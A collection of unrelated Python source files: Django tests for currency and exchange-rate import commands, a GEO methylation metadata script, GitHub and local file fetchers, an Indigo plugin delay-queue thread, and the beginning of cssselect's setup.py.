    session_cls = MagicMock()
    # Session() yields the instance whose .get always raises
    session_cls.return_value.get = mock_requestget_exception()
    return session_cls
# Mock the source APIs for the main tests for speed and to prevent hammering & DoS protection
# We don't mock yahoo because it's already down
# Patch both source APIs at class level so every test runs against local
# fixture files instead of the live services.
@patch('currencies.management.commands._currencyiso.get',
    mock_requestget_response(
        os.path.join(os.path.dirname(cwd), 'management', 'commands', '_currencyiso.xml')))
@patch('currencies.management.commands._openexchangerates_client.requests.Session',
    mock_requestsession_getjson(
        os.path.join(os.path.dirname(cwd), 'management', 'commands', '_openexchangerates.json')))
class BaseTestMixin(object):
    """
    Test suite for minimal source functionality:
    Currencies - code & name
    Symbols - inherited by base handler taken from static file currencies.json
    No cache file
    No info
    No rate updates - factor
    Tests for functionality can be overridden with the included mixins
    """
    # Extra positional args prepended to every management command invocation
    # (subclasses set this to select a specific source, e.g. ('oxr',)).
    source_arg = ()
    # Sample currencies with 0, 2 and 3 decimal places respectively; all are
    # absent from the fixture so imports of them are observable.
    _code_0dp = 'JPY'
    _symb_0dp = '¥'
    _name_0dp = 'Yen'
    _code_2dp = 'GBP'
    _symb_2dp = '£'
    _name_2dp = 'Pound'
    _code_3dp = 'KWD'
    _symb_3dp = 'د.ك'
    _name_3dp = 'Dinar'
    _newcodes = [_code_0dp, _code_2dp, _code_3dp]
    _newsymbs = [_symb_0dp, _symb_2dp, _symb_3dp]
    _newnames = [_name_0dp, _name_2dp, _name_3dp]
    # A currency already present in the fixture
    _code_exist = 'USD'
    _symb_exist = '$'
    _name_exist = 'Dollar'
    # The base currency present in the fixture
    _code_base = 'EUR'
    _symb_base = '€'
    _name_base = 'Euro'
    # Tolerance when comparing record timestamps against "now"
    _now_delta = timedelta(seconds=1)
    # Info keys that every imported currency carries at minimum
    _min_info = ['Created', 'Modified']
    def run_cmd_verify_stdout(self, min_lines, cmd, *args, **kwargs):
        "Runs the given command with full verbosity and checks there are output strings"
        args = self.source_arg + args
        kwargs.setdefault('verbosity', 3)
        buf = StringIO()
        call_command(cmd, stdout=buf, stderr=buf, *args, **kwargs)
        output = buf.getvalue().splitlines()
        buf.close()
        # The command must have printed at least min_lines lines
        self.assertGreaterEqual(len(output), min_lines)
        return output
    def default_currency_cmd(self):
        "Single currency import that is reused for a lot of basic tests"
        return self.run_cmd_verify_stdout(2, 'currencies', '-i=' + self._code_2dp)
    def import_all(self):
        # Import every currency the source provides (no -i filter)
        return self.run_cmd_verify_stdout(20, 'currencies')
    def import_one(self):
        # Import with selection expected to come from a settings variable
        return self.run_cmd_verify_stdout(2, 'currencies')
    def default_rate_cmd(self):
        "Rate update command that is reused for a lot of basic tests. Uses the base from the db"
        return self.run_cmd_verify_stdout(3, 'updatecurrencies')
    def _verify_stdout_msg(msglist):
        "Ensure one of the messages is in the command stdout"
        def decorator(func):
            @wraps(func)
            def wrapper(inst, *args, **kwargs):
                lines = func(inst, *args, **kwargs)
                output = '\n'.join(lines)
                # Pass if ANY of the candidate messages appears in the output
                match = False
                for msg in msglist:
                    if msg in output:
                        match = True
                        break
                inst.assertIs(match, True)
                return lines
            return wrapper
        return decorator
    def _verify_new_currencies(func):
        """
        Wrapper for testing commands that add new currencies
        Django 1.11 introduced queryset difference(). This would be a better way to implement this wrapper
        but currently we're supporting 1.8
        """
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            # Snapshot the table before the command runs
            before_qs = Currency.objects.all()
            before_rows = len(before_qs)
            before_codes = set(record.code for record in before_qs)
            runtime = datetime.now()
            # The command that creates the currencies
            ret = func(inst, *args, **kwargs)
            after_qs = Currency.objects.all()
            after_rows = len(after_qs)
            after_codes = set(record.code for record in after_qs)
            new_codes = after_codes - before_codes
            # There are some new entries
            inst.assertGreater(len(new_codes), 0)
            for code in new_codes:
                record = after_qs.get(code=code)
                # There is a name on each entry
                inst.assertTrue(record.name)
                # Some common codes have symbols
                if code in inst._newcodes:
                    inst.assertTrue(record.symbol)
                # `Created` and `Modified` dates are approx now()
                inst.assertAlmostEqual(runtime, fromisoformat(record.info['Created']), delta=inst._now_delta)
                inst.assertAlmostEqual(runtime, fromisoformat(record.info['Modified']), delta=inst._now_delta)
            return ret
        return wrapper
    def _verify_new_currencylist(currency_list):
        "Wrapper for testing a specific list of currencies"
        def decorator(func):
            @wraps(func)
            def wrapper(inst, *args, **kwargs):
                # Each listed code must be absent beforehand...
                qs = Currency.objects.all()
                for code in currency_list:
                    inst.assertRaises(Currency.DoesNotExist, qs.get, code=code)
                ret = func(inst, *args, **kwargs)
                # ...and present afterwards
                qs = Currency.objects.all()
                for code in currency_list:
                    inst.assertIs(qs.filter(code=code).exists(), True)
                return ret
            return wrapper
        return decorator
    def _verify_new_names(func):
        "Wrapper for checking new currencies get a sensible name"
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            ret = func(inst, *args, **kwargs)
            names = zip(inst._newcodes, inst._newnames)
            qs = Currency.objects.all()
            for code, name in names:
                # Regex match: the imported name need only contain the expected word
                inst.assertRegexpMatches(qs.get(code=code).name, name)
            return ret
        return wrapper
    def _verify_new_symbols(func):
        "Wrapper for checking some new symbols have been populated"
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            ret = func(inst, *args, **kwargs)
            symbs = zip(inst._newcodes, inst._newsymbs)
            qs = Currency.objects.all()
            for code, symb in symbs:
                inst.assertEqual(qs.get(code=code).symbol, symb)
            return ret
        return wrapper
    def _verify_no_info(func):
        "Wrapper for checking info is minimal on new imports"
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            ret = func(inst, *args, **kwargs)
            qs = Currency.objects.all()
            for code in inst._newcodes:
                # Only the Created/Modified keys should exist
                inst.assertEqual(sorted(list(qs.get(code=code).info.keys())), inst._min_info)
            return ret
        return wrapper
    ### TESTS FOR SOURCES THAT SUPPORT IMPORTING NEW CURRENCIES ###
    ## POSITIVE Tests ##
    @_verify_new_currencies
    def test_import_all_currencies_bydefault(self):
        "Currencies: No parameters imports all currencies"
        self.import_all()
    @_verify_new_currencies
    def test_import_all_currencies_byemptysetting(self):
        "Currencies: Empty CURRENCIES setting imports all currencies"
        with self.settings(CURRENCIES=[]):
            self.import_all()
    @_verify_new_currencylist([_code_0dp])
    @_verify_new_currencies
    def test_import_variable_CURRENCIES(self):
        "Currencies: CURRENCIES setting works"
        with self.settings(CURRENCIES=[self._code_0dp]):
            self.import_one()
    @_verify_new_currencylist([_code_2dp])
    @_verify_new_currencies
    def test_import_variable_SHOP_CURRENCIES(self):
        "Currencies: SHOP_CURRENCIES setting works"
        with self.settings(SHOP_CURRENCIES=[self._code_2dp]):
            self.import_one()
    @_verify_new_currencylist([_code_0dp])
    @_verify_new_currencies
    def test_import_variable_BOTH(self):
        "Currencies: CURRENCIES setting is given priority"
        with self.settings(SHOP_CURRENCIES=[self._code_2dp], CURRENCIES=[self._code_0dp]):
            self.import_one()
            # The lower-priority setting must NOT have been imported
            self.assertRaises(Currency.DoesNotExist, Currency.objects.get, code=self._code_2dp)
    @_verify_new_currencylist([_code_3dp])
    @_verify_new_currencies
    def test_import_variable_WIBBLE(self):
        "Currencies: Custom setting works"
        with self.settings(WIBBLE=[self._code_3dp]):
            self.run_cmd_verify_stdout(2, 'currencies', '--import=WIBBLE')
    @_verify_new_currencylist([_code_0dp])
    @_verify_new_currencies
    def test_import_single_currency_long(self):
        "Currencies: Long import syntax"
        self.run_cmd_verify_stdout(2, 'currencies', '--import=' + self._code_0dp)
    @_verify_new_currencylist([_code_2dp])
    @_verify_new_currencies
    def test_import_single_currency_short(self):
        "Currencies: Short import syntax"
        self.default_currency_cmd()
    @_verify_new_symbols
    @_verify_new_names
    @_verify_new_currencylist(_newcodes)
    @_verify_new_currencies
    def test_import_single_currencies_mix(self):
        "Currencies: Mix of import syntax. Also names and symbols are populated"
        self.run_cmd_verify_stdout(3, 'currencies',
            '--import=' + self._code_3dp, '-i=' + self._code_2dp, '-i=' + self._code_0dp)
    def test_skip_existing_currency(self):
        "Currencies: Skip existing currency"
        before = Currency.objects.get(code=self._code_exist)
        self.run_cmd_verify_stdout(2, 'currencies', '-i=' + self._code_exist)
        after = Currency.objects.get(code=self._code_exist)
        # Without --force the record must be untouched
        self.assertEqual(before.name, after.name)
        self.assertEqual(before.symbol, after.symbol)
        self.assertEqual(before.factor, after.factor)
        self.assertEqual(before.info, after.info)
    def test_force_existing_currency(self):
        "Currencies: Overwrite existing currency"
        before = Currency.objects.get(code=self._code_exist)
        runtime = datetime.now()
        self.run_cmd_verify_stdout(2, 'currencies', '--force', '-i=' + self._code_exist)
        after = Currency.objects.get(code=self._code_exist)
        # --force rewrites the info, stamping a fresh Modified time
        self.assertNotEqual(before.info, after.info)
        self.assertAlmostEqual(runtime, fromisoformat(after.info['Modified']), delta=self._now_delta)
    # Test overridden in IncInfoMixin
    @_verify_no_info
    def test_info(self):
        "Currencies: only minimal info captured"
        self.import_all()
    # Test overridden in IncRatesMixin
    @_verify_stdout_msg(['source does not provide currency rate information', 'Deprecated'])
    def test_update_rates(self):
        "Rates: not supported"
        return self.default_rate_cmd()
    ## NEGATIVE Tests ##
    # This test is overridden in IncCacheMixin
    def test_no_connectivity(self):
        "Currencies: Simulate connection problem"
        with patch('currencies.management.commands._openexchangerates_client.requests.Session',
                mock_requestsession_getexception()):
            self.assertRaises(Exception, self.default_currency_cmd)
    def test_import_invalid_variable(self):
        "Currencies: Invalid import options"
        # Unknown settings name
        with self.assertRaises(AttributeError):
            self.run_cmd_verify_stdout(2, 'currencies', '--import=WIBBLE')
        # Empty, too-short, lower-case and unknown ISO codes
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'currencies', '-i=')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'currencies', '-i=AB')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'currencies', '-i=gbp')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'currencies', '--import=ZZZ')
class IncCacheMixin(object):
    "For source handlers that cache their currencies"
    def _move_cache_file(modulename):
        "Wrapper for testing the currency cache file. Keeps the newest file with size>0"
        def decorator(func):
            @wraps(func)
            def wrapper(inst, *args, **kwargs):
                from importlib import import_module
                from random import randint
                module = import_module(modulename)
                modfile = module.CurrencyHandler._cached_currency_file
                # Move the cache aside under a random temp name so the wrapped
                # test runs without a cache file present
                orgfile = os.path.join(os.path.dirname(modfile), str(randint(100000, 999999)) + '.tmp')
                os.rename(modfile, orgfile)
                ret = func(inst, *args, **kwargs)
                try:
                    modfileinfo = os.stat(modfile)
                except Exception:
                    # No new cache file was produced: restore the original
                    os.rename(orgfile, modfile)
                else:
                    if modfileinfo.st_size > 0 and modfileinfo.st_mtime > os.stat(orgfile).st_mtime:
                        # Keep the freshly written, non-empty cache file
                        os.remove(orgfile)
                    else:
                        # New file is empty or stale: put the original back
                        os.remove(modfile)
                        os.rename(orgfile, modfile)
                return ret
            return wrapper
        return decorator
    @patch('currencies.management.commands._currencyiso.CurrencyHandler.endpoint', 'http://www.google.com/test.xml')
    @patch('currencies.management.commands._yahoofinance.CurrencyHandler.endpoint', 'http://www.google.com/test.json')
    def test_import_source_down(self):
        "Currencies: Simulate source down - imports from cache"
        self.default_currency_cmd()
    @patch('currencies.management.commands._currencyiso.get', mock_requestget_exception())
    @patch('currencies.management.commands._yahoofinance.get', mock_requestget_exception())
    def test_no_connectivity(self):
        "Currencies: Simulate connection problem - imports from cache"
        self.default_currency_cmd()
    @_move_cache_file('currencies.management.commands._currencyiso')
    @_move_cache_file('currencies.management.commands._yahoofinance')
    def test_no_cache(self):
        "Currencies: Simulate no cache file - imports from API"
        self.default_currency_cmd()
    @_move_cache_file('currencies.management.commands._currencyiso')
    @_move_cache_file('currencies.management.commands._yahoofinance')
    @patch('currencies.management.commands._currencyiso.get', mock_requestget_exception())
    @patch('currencies.management.commands._yahoofinance.get', mock_requestget_exception())
    def test_no_connectivity_or_cache(self):
        "Currencies: Simulate connection problem & no cache - exception"
        self.assertRaises(RuntimeError, self.default_currency_cmd)
    # Strange fix for externally referenced python 2.7 decorator methods
    if sys.version_info.major == 2:
        _move_cache_file = staticmethod(_move_cache_file)
class IncInfoMixin(object):
    "For sources that support currency info"
    def _verify_new_info(func):
        "Wrapper asserting imported currencies carry more than the minimal info keys"
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            result = func(inst, *args, **kwargs)
            currencies = Currency.objects.all()
            for currency_code in inst._newcodes:
                info_keys = sorted(list(currencies.get(code=currency_code).info.keys()))
                # More keys than just Created/Modified must be present
                inst.assertNotEqual(info_keys, inst._min_info)
            return result
        return wrapper
    @_verify_new_info
    def test_info(self):
        "Currencies: extra info"
        self.import_all()
# Serve a fixed USD-based rates file for every rate update in this mixin
@patch('currencies.management.commands._openexchangerates_client.requests.Session',
    mock_requestsession_getjson(os.path.join(cwd, 'oxr_USD.json')))
class IncRatesMixin(object):
    "For sources that support exchange rates"
    def _verify_rates(base_code):
        "Wrapper for testing that the rates are not 1.0 after an update and the specified base is set"
        def decorator(func):
            @wraps(func)
            def wrapper(inst, *args, **kwargs):
                # Reset all factors to 1.0 first so a successful update is detectable
                inst.assertGreater(Currency.objects.update(factor=1.0), 1)
                ret = func(inst, *args, **kwargs)
                after_qs = Currency.objects.all()
                for curr in after_qs.filter(is_base=False):
                    inst.assertNotEqual(curr.factor, 1.0)
                # The expected base has factor 1.0 and is flagged is_base
                inst.assertEqual(after_qs.get(code=base_code, is_base=True).factor, 1.0)
                return ret
            return wrapper
        return decorator
    def _verify_rate_change(func):
        "Wrapper to ensure the base changed"
        @wraps(func)
        def wrapper(inst, *args, **kwargs):
            before_base = Currency.objects.get(is_base=True).code
            ret = func(inst, *args, **kwargs)
            after_base = Currency.objects.get(is_base=True).code
            inst.assertNotEqual(before_base, after_base)
            return ret
        return wrapper
    ## POSITIVE Tests ##
    @_verify_rates('USD')
    def test_update_rates_nobase(self):
        "Rates: Update without supplying a base at all - USD"
        # Clear every is_base flag so the command must fall back to USD
        base = Currency.objects.update(is_base=False)
        self.default_rate_cmd()
    @_verify_rates(BaseTestMixin._code_base)
    def test_update_rates(self):
        "Rates: Update currency rates with the db base"
        self.default_rate_cmd()
    @_verify_rate_change
    @_verify_rates(BaseTestMixin._code_exist)
    def test_update_rates_specifybase(self):
        "Rates: Update currency rates with a specific base"
        self.run_cmd_verify_stdout(4, 'updatecurrencies', '--base=' + self._code_exist)
    @_verify_rate_change
    @_verify_rates(BaseTestMixin._code_exist)
    def test_update_rates_variable_CURRENCIES_BASE(self):
        "Rates: Update currency rates using the CURRENCIES_BASE setting variable"
        with self.settings(CURRENCIES_BASE=self._code_exist):
            self.default_rate_cmd()
    @_verify_rate_change
    @_verify_rates(BaseTestMixin._code_exist)
    def test_update_rates_variable_SHOP_DEFAULT_CURRENCY(self):
        "Rates: Update currency rates using the SHOP_DEFAULT_CURRENCY setting variable"
        with self.settings(SHOP_DEFAULT_CURRENCY=self._code_exist):
            self.default_rate_cmd()
    @_verify_rate_change
    @_verify_rates(BaseTestMixin._code_exist)
    def test_update_rates_variable_BOTH(self):
        "Rates: CURRENCIES_BASE is given priority"
        with self.settings(CURRENCIES_BASE=self._code_exist, SHOP_DEFAULT_CURRENCY=self._code_base):
            self.default_rate_cmd()
    @_verify_rate_change
    @_verify_rates(BaseTestMixin._code_exist)
    def test_update_rates_variable_WIBBLE(self):
        "Rates: Update currency rates using the WIBBLE setting variable"
        with self.settings(WIBBLE=self._code_exist):
            self.run_cmd_verify_stdout(4, 'updatecurrencies', '--base=WIBBLE')
    ## NEGATIVE Tests ##
    def test_update_rates_invalid_variable(self):
        "Rates: Invalid base option"
        # Unknown settings name, then malformed/unknown ISO codes
        with self.assertRaises(AttributeError):
            self.run_cmd_verify_stdout(2, 'updatecurrencies', '--base=WIBBLE')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=' + self._code_2dp)
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=AB')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'updatecurrencies', '-b=gbp')
        with self.assertRaises(ImproperlyConfigured):
            self.run_cmd_verify_stdout(2, 'updatecurrencies', '--base=ZZZ')
    def test_update_no_connectivity(self):
        "Rates: Simulate connection problem"
        # Patch inside the function to override the class patch
        with patch('currencies.management.commands._openexchangerates_client.requests.Session',
                mock_requestsession_getexception()):
            self.assertRaises(Exception, self.default_rate_cmd)
### ACTUAL CURRENCY SOURCE TEST CLASSES ###
@override_settings( **default_settings )
#TODO: No caching of currencies currently implemented for OpenExchangeRates: IncCacheMixin
class DefaultTest(IncRatesMixin, BaseTestMixin, TestCase):
    "Test OpenExchangeRates support: the default source"
    fixtures = ['currencies_test']
    ## NEGATIVE Tests ##
    @override_settings()
    def test_missing_APP_ID_currencies(self):
        "Currencies: No APP_ID"
        from django.conf import settings
        # override_settings() snapshots settings so deleting here is reverted after the test
        del settings.OPENEXCHANGERATES_APP_ID
        self.assertRaises(ImproperlyConfigured, self.default_currency_cmd)
    @override_settings()
    def test_missing_APP_ID_update(self):
        "Rates: No APP_ID"
        from django.conf import settings
        del settings.OPENEXCHANGERATES_APP_ID
        self.assertRaises(ImproperlyConfigured, self.default_rate_cmd)
class OXRTest(DefaultTest):
    "Test OpenExchangeRates support: when specified"
    # Same suite as DefaultTest, but every command explicitly names the 'oxr' source
    source_arg = ('oxr',)
class YahooTest(IncInfoMixin, IncCacheMixin, BaseTestMixin, TestCase):
    "Test Yahoo support"
    fixtures = ['currencies_test']
    source_arg = ('yahoo',)
    ## NEGATIVE Tests ##
    # Overrides the base test due to API withdrawal
    @IncCacheMixin._move_cache_file('currencies.management.commands._yahoofinance')
    def test_no_cache(self):
        "Currencies: Simulate no cache file - API withdrawn so will raise exception"
        # With no cache and a dead API, the import must fail
        self.assertRaises(RuntimeError, self.default_currency_cmd)
class ISOTest(IncInfoMixin, IncCacheMixin, BaseTestMixin, TestCase):
    "Test Currency ISO support"
    fixtures = ['currencies_test']
    # Run every command against the 'iso' source
    source_arg = ('iso',)
|
import GEOparse
import pandas as pd
from pathlib import Path
import pathlib
import pickle
import re
from scripts.python.GEO.routines import get_gse_gsm_info, process_characteristics_ch1
# --- Configuration ----------------------------------------------------------
gpl = 'GPL13534'
gse = 'GSE116379'
# Raw strings: these patterns contain backslash escapes that are invalid
# escape sequences in ordinary string literals (DeprecationWarning on py3).
characteristics_ch1_regex_findall = r';*([a-zA-Z0-9\^\/\=\-\:\,\.\s_\(\)]+): '
characteristics_ch1_regex_split = r'(;*[a-zA-Z0-9\^\/\=\-\,\:\.\s_\(\)]+: )'
path = "E:/YandexDisk/Work/pydnameth/datasets"

# --- Load sample (GSM) metadata from the local GEOmetadb dump ---------------
gsm_df, gse_gsms_dict = get_gse_gsm_info(f"{path}/GEO", gpl)
pathlib.Path(f"{path}/{gpl}/{gse}/raw/GEO").mkdir(parents=True, exist_ok=True)
gsms = gse_gsms_dict[gse]
gse_df_1 = gsm_df.loc[gsm_df.index.isin(gsms), :]

# --- Download series metadata via GEOparse, retrying transient failures -----
# Cap the retries: the previous unconditional retry loop could spin forever on
# a persistent network/parse failure.
max_attempts = 10
for attempt in range(max_attempts):
    try:
        gse_data = GEOparse.get_GEO(geo=gse, destdir=f"{path}/{gpl}/{gse}/raw/GEO", include_data=False, how="quick", silent=True)
    except (ValueError, ConnectionError, IOError):
        continue
    break
else:
    raise RuntimeError(f"Failed to download {gse} metadata after {max_attempts} attempts")

# --- Decide which metadata source to trust ----------------------------------
gse_df_2 = gse_data.phenotype_data
if gse_df_2.empty:
    # GEOparse returned nothing: fall back to the GEOmetadb records
    process_type = 'GEOmetadb'
else:
    gse_df_2.index.name = 'gsm'
    gse_df_2.replace('NONE', pd.NA, inplace=True)
    gse_df_2 = gse_df_2.loc[(gse_df_2['platform_id'] == gpl), :]
    is_index_equal = set(gse_df_1.index) == set(gse_df_2.index)
    if is_index_equal:
        process_type = 'Common'
    else:
        print(f"GEOmetadb: {gse_df_1.shape[0]}")
        print(f"GEOparse: {gse_df_2.shape[0]}")
        # Prefer whichever source covers more samples
        if gse_df_2.shape[0] > gse_df_1.shape[0]:
            process_type = 'GEOparse'
        else:
            process_type = 'GEOmetadb'
print(f"process_type: {process_type}")

# --- Build the merged phenotype frame and collect characteristic keys -------
if process_type == 'Common':
    gse_df_1 = gse_df_1.loc[gse_df_2.index, :]
    gse_df = pd.merge(gse_df_2, gse_df_1['characteristics_ch1'], left_index=True, right_index=True)
    chars_df_1 = set.union(*gse_df['characteristics_ch1'].str.findall(characteristics_ch1_regex_findall).apply(set).to_list())
    process_characteristics_ch1(gse_df, characteristics_ch1_regex_split)
elif process_type == 'GEOmetadb':
    gse_df = gse_df_1
    chars_df_1 = set.union(*gse_df['characteristics_ch1'].str.findall(characteristics_ch1_regex_findall).apply(set).to_list())
    process_characteristics_ch1(gse_df, characteristics_ch1_regex_split)
elif process_type == 'GEOparse':
    gse_df = gse_df_2.copy()
    chars_df_1 = set()
else:
    # Plain string: the previous f-string had no placeholders
    raise ValueError("Unsupported process_type")
if process_type in ['GEOparse', 'Common']:
    # GEOparse stores characteristics in columns named characteristics_ch1.<i>.<key>
    chars_cols = gse_df.columns.values[gse_df.columns.str.startswith('characteristics_ch1.')]
    r = re.compile(r"characteristics_ch1.\d*.(.*)")
    chars_df_2 = set([r.findall(x)[0] for x in chars_cols])
else:
    chars_df_2 = set()
chars_all = chars_df_1.union(chars_df_2)
if chars_df_2 != chars_df_1:
    print(f"Chars from GEOmetadb ({len(chars_df_1)}) and GEOparse ({len(chars_df_2)}) differs!")

# --- Extract Illumina sample sheet fields from supplementary files ----------
if not gse_df['supplementary_file'].isnull().all():
    supp_files_split = gse_df['supplementary_file'].str.split(r'[,;]\s*', expand=True, regex=True)
    if supp_files_split.shape[1] == 2:
        gse_df[['supplementary_file_1', 'supplementary_file_2']] = supp_files_split
        # Filename stem encodes Sample_Name, Sentrix_ID and Sentrix_Position
        supp_details = gse_df['supplementary_file_1'].str.findall(r'(?:.*\/)(.*)(?:_\w*.\..*\..*)').explode().str.split('_', expand=True)
        if supp_details.shape[1] == 3:
            gse_df[['Sample_Name', 'Sentrix_ID', 'Sentrix_Position']] = supp_details
gse_df.to_excel(f"{path}/{gpl}/{gse}/pheno.xlsx", index=True)
|
from src.add import add
def test_add():
    # Adding two and two must give four
    assert add(2, 2) == 4
|
""" Module for Beacon APIs
Example - Deploy a declaration::
from f5sdk.cs.beacon.declare import DeclareClient
declare_client = DeclareClient(mgmt_client)
declare_client.create(config={'action': 'deploy', 'declaration': []})
"""
__all__ = []
|
# -*- coding: utf-8 -*-
# Copyright 2018 Etsy Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import base64
import os
class BaseFileFetcher(object):
    """Abstract interface for objects that fetch file content by relative path."""
    # NOTE(review): `__metaclass__` is the Python 2 mechanism for attaching a
    # metaclass; under Python 3 this attribute is ignored, so @abstractmethod
    # is NOT enforced there. If Python 2 support is dropped, switch to
    # `class BaseFileFetcher(abc.ABC)` -- confirm intended Python versions.
    __metaclass__ = abc.ABCMeta
    @abc.abstractmethod
    def fetch_file_content(self, rel_path):
        # Return the content of the file at rel_path, relative to the fetcher's root
        pass
class LocalFileFetcher(BaseFileFetcher):
    """Fetches file content from the local filesystem, rooted at base_path."""
    def __init__(self, base_path):
        self.base_path = base_path

    def fetch_file_content(self, rel_path):
        # Strip any leading slash so os.path.join treats rel_path as relative
        target = os.path.join(self.base_path, rel_path.lstrip('/'))
        with open(target) as handle:
            return handle.read()
class GithubFileFetcher(BaseFileFetcher):
    """A fetcher that retrieves file content from a Github repository.

    :param base_path: base path of files in the repository
    :type base_path: str
    :param repo_owner: owner (user or organization) of the repository
    :param repo_name: name of the repository
    :param repo_ref: branch or ref from which to fetch files. Default: master
    :param github_url: base URL of a Github Enterprise instance; when omitted,
        public github.com is used
    :param github_token: token for authentication
    :param github_username: username for basic authentication
    :param github_password: password for basic authentication
    """

    def __init__(
            self,
            base_path,
            repo_owner,
            repo_name,
            repo_ref=None,
            github_url=None,
            github_token=None,
            github_username=None,
            github_password=None):
        self.base_path = base_path
        self.repo_owner = repo_owner
        self.repo_name = repo_name
        self.repo_ref = repo_ref or 'master'
        self.github_url = github_url
        self.github_token = github_token
        self.github_username = github_username
        self.github_password = github_password
        self.github = self._get_github()
        self.repository = self._get_repository()

    def _get_github(self):
        # Import lazily so github3 is only required when this fetcher is used
        try:
            import github3
        except ImportError:
            raise Exception("""
            ERROR: github3.py not installed! Please install via
            pip install boundary-layer[github]
            and try again.""")
        credentials = {
            'username': self.github_username,
            'password': self.github_password,
            'token': self.github_token,
        }
        # An explicit URL means a Github Enterprise deployment
        if self.github_url:
            return github3.GitHubEnterprise(url=self.github_url, **credentials)
        return github3.GitHub(**credentials)

    def _get_repository(self):
        return self.github.repository(self.repo_owner, self.repo_name)

    def fetch_file_content(self, rel_path):
        full_path = os.path.join(self.base_path, rel_path.lstrip('/'))
        # The Github contents API returns the payload base64-encoded
        encoded = self.repository.file_contents(path=full_path, ref=self.repo_ref).content
        return base64.b64decode(encoded)
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Delay Handler © Autolog 2020
#
try:
# noinspection PyUnresolvedReferences
import indigo
except ImportError:
pass
import logging
import queue
import sys
import threading
import time
import traceback
from constants import *
# noinspection PyUnresolvedReferences,PyPep8Naming
class ThreadDelayHandler(threading.Thread):
    # This class handles Delay Queue processing: it drains the plugin's
    # delayHandler queue, forwarding poll commands to the trvHandler queue
    # with a configurable pause between them.
    def __init__(self, pluginGlobals, event):
        threading.Thread.__init__(self)
        self.globals = pluginGlobals
        self.delayHandlerLogger = logging.getLogger("Plugin.TRV_DH")
        self.delayHandlerLogger.debug("Debugging Delay Handler Thread")
        # Event set by the plugin when this thread should stop
        self.threadStop = event
    def exception_handler(self, exception_error_message, log_failing_statement):
        # Log an exception with module / method / line context pulled from the traceback
        filename, line_number, method, statement = traceback.extract_tb(sys.exc_info()[2])[-1]
        module = filename.split('/')
        log_message = f"'{exception_error_message}' in module '{module[-1]}', method '{method}'"
        if log_failing_statement:
            log_message = log_message + f"\n Failing statement [line {line_number}]: '{statement}'"
        else:
            log_message = log_message + f" at line {line_number}"
        self.delayHandlerLogger.error(log_message)
    def run(self):
        try:
            self.delayHandlerLogger.debug('Delay Handler Thread initialised')
            # Main loop: runs until the plugin sets the stop event
            while not self.threadStop.is_set():
                try:
                    # Block for up to 5 seconds waiting for a queue entry
                    delayQueuedEntry = self.globals['queues']['delayHandler'].get(True, 5)
                    # delayQueuedEntry format:
                    #   - Device
                    #   - Polling Sequence
                    # self.delayHandlerLogger.debug(f'DEQUEUED MESSAGE = {delayQueuedEntry}')
                    # trvCommand, trvCommandDevId, pollingSequence = delayQueuedEntry
                    trvCommand, trvCommandDevId = delayQueuedEntry
                    if trvCommand == CMD_STOP_THREAD:
                        break  # Exit While loop and quit thread
                    # Check if monitoring / debug options have changed and if so set accordingly
                    if self.globals['debug']['previousDelayHandler'] != self.globals['debug']['delayHandler']:
                        self.globals['debug']['previousDelayHandler'] = self.globals['debug']['delayHandler']
                        self.delayHandlerLogger.setLevel(self.globals['debug']['delayHandler'])
                    if trvCommand != CMD_ACTION_POLL:
                        # Only poll commands are handled; silently drop anything else
                        continue
                    # Forward the poll to the TRV handler queue at medium priority
                    self.globals['queues']['trvHandler'].put([QUEUE_PRIORITY_STATUS_MEDIUM, 0, CMD_ACTION_POLL, trvCommandDevId, []])
                    delay_time = self.globals['config']['delayQueueSeconds']
                    self.delayHandlerLogger.debug(
                        f'DELAY QUEUE ENTRY RETRIEVED FOR DEVICE: {indigo.devices[trvCommandDevId].name}, Command is \'{CMD_TRANSLATION[CMD_ACTION_POLL]}\'.\nDELAYING FOR {delay_time} SECONDS. Remaining queue size is {self.globals["queues"]["delayHandler"].qsize()}')
                    # Throttle: pause before servicing the next queued poll
                    time.sleep(delay_time)
                    self.delayHandlerLogger.debug(f'DELAY COMPLETED AFTER {delay_time} SECONDS.\nRemaining queue size is {self.globals["queues"]["delayHandler"].qsize()}')
                except queue.Empty:
                    # Nothing queued within the timeout; loop round and re-check the stop event
                    pass
                except Exception as exception_error:
                    self.exception_handler(exception_error, True)  # Log error and display failing statement
        except Exception as exception_error:
            self.exception_handler(exception_error, True)  # Log error and display failing statement
        self.delayHandlerLogger.debug('Delay Handler Thread ended.')
|
# coding: utf8
import re
import os.path
try:
    from setuptools import setup
    extra_kwargs = {'test_suite': 'cssselect.tests'}
except ImportError:
    # Fall back to distutils when setuptools is unavailable
    from distutils.core import setup
    extra_kwargs = {}


def read_file(path):
    """Return the full content of *path*, guaranteeing the handle is closed.

    The previous ``open(...).read()`` pattern leaked file handles; try/finally
    (rather than ``with``) keeps compatibility with the very old Python
    versions this package advertises support for.
    """
    f = open(path)
    try:
        return f.read()
    finally:
        f.close()


ROOT = os.path.dirname(__file__)
README = read_file(os.path.join(ROOT, 'README.rst'))
INIT_PY = read_file(os.path.join(ROOT, 'cssselect', '__init__.py'))
# Single source of truth for the version: parse it out of cssselect/__init__.py
VERSION = re.search("VERSION = '([^']+)'", INIT_PY).group(1)

setup(
    name='cssselect',
    version=VERSION,
